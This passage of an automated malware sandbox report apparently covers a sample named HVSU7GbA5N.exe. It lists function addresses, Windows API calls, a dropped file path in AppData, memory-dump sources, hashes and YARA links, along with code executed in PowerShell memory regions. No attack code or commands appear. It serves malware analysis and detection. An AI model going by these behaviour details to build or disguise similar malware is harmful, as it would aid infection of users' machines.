                                                                                                                                            • Opcode Fuzzy Hash: 6c97ca4c977f86aacd357c2655dec619d2d0312ab6bad79a0316e8acbd74949c
                                                                                                                                            • Instruction Fuzzy Hash: E3018671958340AFEB015BB4AE0ABAA3FB4E715705F208439F142B72E2C57854159B2F
                                                                                                                                            Function 00401BB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                                                                                                                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$Timeout
                                                                                                                                            • String ID: !
                                                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                                                            • Opcode ID: 5bd36806d10e7675ce8922960c3dd847d1fc55b80fe462cbded294bcfffbeb76
                                                                                                                                            • Instruction ID: aec06c1df61e239cd4f76122eecd213935ad84fca4bb147c4325ce067fac4872
                                                                                                                                            • Opcode Fuzzy Hash: 5bd36806d10e7675ce8922960c3dd847d1fc55b80fe462cbded294bcfffbeb76
                                                                                                                                            • Instruction Fuzzy Hash: B82190B1A44208BFEF41AFB4CE4AAAE7BB5EF40344F14453EF541B61D1D6B89A40D728
                                                                                                                                            Function 0040564D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405653
                                                                                                                                            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 0040565C
                                                                                                                                            • lstrcatA.KERNEL32(?,00409014), ref: 0040566D
                                                                                                                                            Strings
                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040564D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                            • API String ID: 2659869361-4083868402
                                                                                                                                            • Opcode ID: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                                                                                                                            • Instruction ID: 2c4b20d64583e31d373f24845ccb5b94779d1f5d03349b34bc7780515f720d37
                                                                                                                                            • Opcode Fuzzy Hash: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                                                                                                                            • Instruction Fuzzy Hash: 17D0A9626059306AE20223269C05E8B3A58CF02315B040423F200B22A2C73C2D418BFE
                                                                                                                                            Function 00402BC5 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • DestroyWindow.USER32(00000000,00000000,00402DA5,00000001), ref: 00402BD8
                                                                                                                                            • GetTickCount.KERNEL32 ref: 00402BF6
                                                                                                                                            • CreateDialogParamA.USER32(0000006F,00000000,00402B42,00000000), ref: 00402C13
                                                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402C21
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2102729457-0
                                                                                                                                            • Opcode ID: a370bf3714c6657f4aa9727f83cb14b3507f4001cbab91db9230ec4a81342bf5
                                                                                                                                            • Instruction ID: 413067c0dd52ceff9b3bae724ffe8751623181a8cae7bdb8b5040e0cc41620bd
                                                                                                                                            • Opcode Fuzzy Hash: a370bf3714c6657f4aa9727f83cb14b3507f4001cbab91db9230ec4a81342bf5
                                                                                                                                            • Instruction Fuzzy Hash: 43F05E7094A220ABC6216F20BE8CD9F7BBCF704B52B124876F104B12E4D678D8C1DB9C
                                                                                                                                            Function 00404E1A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • IsWindowVisible.USER32(?), ref: 00404E49
                                                                                                                                            • CallWindowProcA.USER32(?,?,?,?), ref: 00404E9A
                                                                                                                                              • Part of subcall function 00403EBF: SendMessageA.USER32(00010458,00000000,00000000,00000000), ref: 00403ED1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                                                            • Opcode ID: ac110b3b9cb7c9f01e5231f91087d53fe1146d3d93b6dd99ce465d5e78f5ea73
                                                                                                                                            • Instruction ID: b130d42bb84d5447e475eed3bbf3cd484b2354f0b63da773ba138cf1eceff29e
                                                                                                                                            • Opcode Fuzzy Hash: ac110b3b9cb7c9f01e5231f91087d53fe1146d3d93b6dd99ce465d5e78f5ea73
                                                                                                                                            • Instruction Fuzzy Hash: CB015EB1500208ABDF219F61DC80AAB3A2AF7C5760F60413BFE04762D1D73A9D51E6E9
                                                                                                                                            Function 004024D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000011), ref: 004024EF
                                                                                                                                            • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\choktallenes\sprgekasserne.Tek,00000000,?,?,00000000,00000011), ref: 0040250E
                                                                                                                                            Strings
                                                                                                                                            • C:\Users\user\AppData\Local\choktallenes\sprgekasserne.Tek, xrefs: 004024DD, 00402502
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileWritelstrlen
                                                                                                                                            • String ID: C:\Users\user\AppData\Local\choktallenes\sprgekasserne.Tek
                                                                                                                                            • API String ID: 427699356-422593886
                                                                                                                                            • Opcode ID: f14869ca4b55f34734d9d1f256202a330c9e6f196b87c06b0e297acaa7f48907
                                                                                                                                            • Instruction ID: 4e81b00b1a0a83b1a618d6832a3b29c213d1c25728c37480281a976930c2fc19
                                                                                                                                            • Opcode Fuzzy Hash: f14869ca4b55f34734d9d1f256202a330c9e6f196b87c06b0e297acaa7f48907
                                                                                                                                            • Instruction Fuzzy Hash: DEF089B2A14144BFDB40EBA49E49EAB7764DB40308F10443BB141F61C2D6FC5941DB7D
                                                                                                                                            Function 00403579 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75573410,00403551,00403375,?), ref: 00403593
                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0040359A
                                                                                                                                            Strings
                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040358B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Free$GlobalLibrary
                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                            • API String ID: 1100898210-4083868402
                                                                                                                                            • Opcode ID: c1f6b4989b579ccb4d1bab47613fbee0e7e5134bf480dcc377e5cd6992e46223
                                                                                                                                            • Instruction ID: 1eddd4fff873b62aaaaf221bd6291171136980a6a9d1eb58fe3111f1a180586d
                                                                                                                                            • Opcode Fuzzy Hash: c1f6b4989b579ccb4d1bab47613fbee0e7e5134bf480dcc377e5cd6992e46223
                                                                                                                                            • Instruction Fuzzy Hash: 26E0C233811020ABC7216F56EC09B9ABB686F48B32F06442AED407B3B0D7746D418FD8
                                                                                                                                            Function 00405694 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C95,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\HVSU7GbA5N.exe,C:\Users\user\Desktop\HVSU7GbA5N.exe,80000000,00000003), ref: 0040569A
                                                                                                                                            • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C95,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\HVSU7GbA5N.exe,C:\Users\user\Desktop\HVSU7GbA5N.exe,80000000,00000003), ref: 004056A8
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CharPrevlstrlen
                                                                                                                                            • String ID: C:\Users\user\Desktop
                                                                                                                                            • API String ID: 2709904686-1876063424
                                                                                                                                            • Opcode ID: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
                                                                                                                                            • Instruction ID: 684961cdd3a6b9df4e479839de86435c839074591af8eb1459d6379f3a08a3e1
                                                                                                                                            • Opcode Fuzzy Hash: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
                                                                                                                                            • Instruction Fuzzy Hash: 04D0A772409D701EF30353108C04B8F7A88CF13300F490862E040E2191C37C1C818BBE
                                                                                                                                            Function 004057B3 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004059E2,00000000,[Rename],00000000,00000000,00000000), ref: 004057C3
                                                                                                                                            • lstrcmpiA.KERNEL32(004059E2,00000000), ref: 004057DB
                                                                                                                                            • CharNextA.USER32(004059E2,?,00000000,004059E2,00000000,[Rename],00000000,00000000,00000000), ref: 004057EC
                                                                                                                                            • lstrlenA.KERNEL32(004059E2,?,00000000,004059E2,00000000,[Rename],00000000,00000000,00000000), ref: 004057F5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 190613189-0
                                                                                                                                            • Opcode ID: 69516db92ab03ac2bd29524685631cd9f8e4e2de886f88dc1d7fd11a4109c375
                                                                                                                                            • Instruction ID: ad6d9dedd63ee89ffd4e190405b35f06ce6ae84d6c36acf6f04f4a95cd08f7cb
                                                                                                                                            • Opcode Fuzzy Hash: 69516db92ab03ac2bd29524685631cd9f8e4e2de886f88dc1d7fd11a4109c375
                                                                                                                                            • Instruction Fuzzy Hash: 66F0C232604558FFCB12DBA4DD4099EBBA8EF06350B2140B9F800F7210D274EE01ABA9

                                                                                                                                            Executed Functions

                                                                                                                                            Function 07D2C4DE Relevance: 1.8, Instructions: 1844COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 87e2f1c21903894c07d2fe8e79fac97c636b48b4855c25d8fd71adc3240cecb9
                                                                                                                                            • Instruction ID: a4b749810909adf46a5e3a115cf6197f2398c48e855bc81fe749b19f81584348
                                                                                                                                            • Opcode Fuzzy Hash: 87e2f1c21903894c07d2fe8e79fac97c636b48b4855c25d8fd71adc3240cecb9
                                                                                                                                            • Instruction Fuzzy Hash: AC0370B4A00325DFE724DB64C850B9AF7B2AF85704F1085A9D809BB745DB72ED82CF61
                                                                                                                                            Function 04DC77F9 Relevance: .1, Instructions: 120COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2011445193.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_4dc0000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6dccff6f6bdf00a2fdc8e9176ef0a4ace44ab216eb88f26c91a0312bae66ed00
                                                                                                                                            • Instruction ID: 4c771c9215f28c3033f3e5f3b6c721abdbdcc6e62458b75ec5841124adcd39ca
                                                                                                                                            • Opcode Fuzzy Hash: 6dccff6f6bdf00a2fdc8e9176ef0a4ace44ab216eb88f26c91a0312bae66ed00
                                                                                                                                            • Instruction Fuzzy Hash: 68415B35B002069FDB19EB34C858AAD7BF2AF89754F08446CE406EB7A0DB34AD45CB90
                                                                                                                                            Function 09A91C60 Relevance: 2.4, Strings: 1, Instructions: 1113COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2032543720.0000000009A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A90000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_9a90000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: _
                                                                                                                                            • API String ID: 0-701932520
                                                                                                                                            • Opcode ID: 2be83af537a28de0b27eb29f3f01cae92b0f6bdb94515e0ebfff8ec746383015
                                                                                                                                            • Instruction ID: 1db8fb547c715d1a9c7e347c484f0eb591e07bf7e69d99eaa8360cc3734f73cf
                                                                                                                                            • Opcode Fuzzy Hash: 2be83af537a28de0b27eb29f3f01cae92b0f6bdb94515e0ebfff8ec746383015
                                                                                                                                            • Instruction Fuzzy Hash: 2692BF74B10205AFDB14DB68C840BAAB7F6FF85B14F14806AE815AF751DB72EC41CBA1
                                                                                                                                            Function 07D22165 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: kDO
                                                                                                                                            • API String ID: 0-2207574971
                                                                                                                                            • Opcode ID: 8af82e2915e430c82b7df46cd2584fb6db56b96b976f17db703a6827788f6f4b
                                                                                                                                            • Instruction ID: 6c12c098d4314c8e38442038058629bf1ae1d3f7d4d097e083ced9c71ad026ee
                                                                                                                                            • Opcode Fuzzy Hash: 8af82e2915e430c82b7df46cd2584fb6db56b96b976f17db703a6827788f6f4b
                                                                                                                                            • Instruction Fuzzy Hash: 8C215BF2B002218BD715A3685C11FAAF352AFD531CB11846BEA01AF740EE72DD4383E2
                                                                                                                                            Function 07D2D2BE Relevance: 1.2, Instructions: 1234COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c0b0350a4a7f62a8da4b743ffaea0d2aacba4c27be1b4a8c5609ad405d218bff
                                                                                                                                            • Instruction ID: 91c2990e10184f4f7bde105ed94d06c1c913bfbff4b09be9628bc2bff807b712
                                                                                                                                            • Opcode Fuzzy Hash: c0b0350a4a7f62a8da4b743ffaea0d2aacba4c27be1b4a8c5609ad405d218bff
                                                                                                                                            • Instruction Fuzzy Hash: B1C2B1B4A10315DFE724DB64C850BAEB7B2AF89704F1085A9D8097B744DB72ED82CF61
                                                                                                                                            Function 07D260C8 Relevance: 1.2, Instructions: 1173COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 049105b669a103b4a4e688d1756fef0833611fd1d1d9fb0dfdc37f85db66a260
                                                                                                                                            • Instruction ID: f4f30029d1eafbf39a53c5ed7502d898800a6b145f52158f995286b8b364a486
                                                                                                                                            • Opcode Fuzzy Hash: 049105b669a103b4a4e688d1756fef0833611fd1d1d9fb0dfdc37f85db66a260
                                                                                                                                            • Instruction Fuzzy Hash: B2A293B4A00325DFDB24DB54C850BAAF7B2AF85304F1484AAD54A6BB41DB71ED83CF61
                                                                                                                                            Function 07D27282 Relevance: .9, Instructions: 890COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 68e7d8b52599d6a180071e5321fad615bbc3d4f7a4dbfc48f6e23a412d25dab4
                                                                                                                                            • Instruction ID: aa4f18282ba2d0cba9b35d1b48d0382bd5111bc738612d09ee9d1fc774048e63
                                                                                                                                            • Opcode Fuzzy Hash: 68e7d8b52599d6a180071e5321fad615bbc3d4f7a4dbfc48f6e23a412d25dab4
                                                                                                                                            • Instruction Fuzzy Hash: FE827FB4A00725DFD724DB54C950BAAB7B2AF85304F10C4AAD94A6BB40DB71ED83CF61
                                                                                                                                            Function 07D2644C Relevance: .8, Instructions: 823COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 47240bb3561dd8a8b2792b6378ec95889977a934d6454b1706fbea654b8f3ba5
                                                                                                                                            • Instruction ID: 89b2e4e961c92df7d3175b2a803e8bd1f5f88fc0576151dd9f62008cd3ae7f7c
                                                                                                                                            • Opcode Fuzzy Hash: 47240bb3561dd8a8b2792b6378ec95889977a934d6454b1706fbea654b8f3ba5
                                                                                                                                            • Instruction Fuzzy Hash: C7726BB4A00325DFDB24DB54C950BAAF7B2AF85304F14C49AD94A6BB44DB31ED82CF61
                                                                                                                                            Function 07D26460 Relevance: .8, Instructions: 814COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
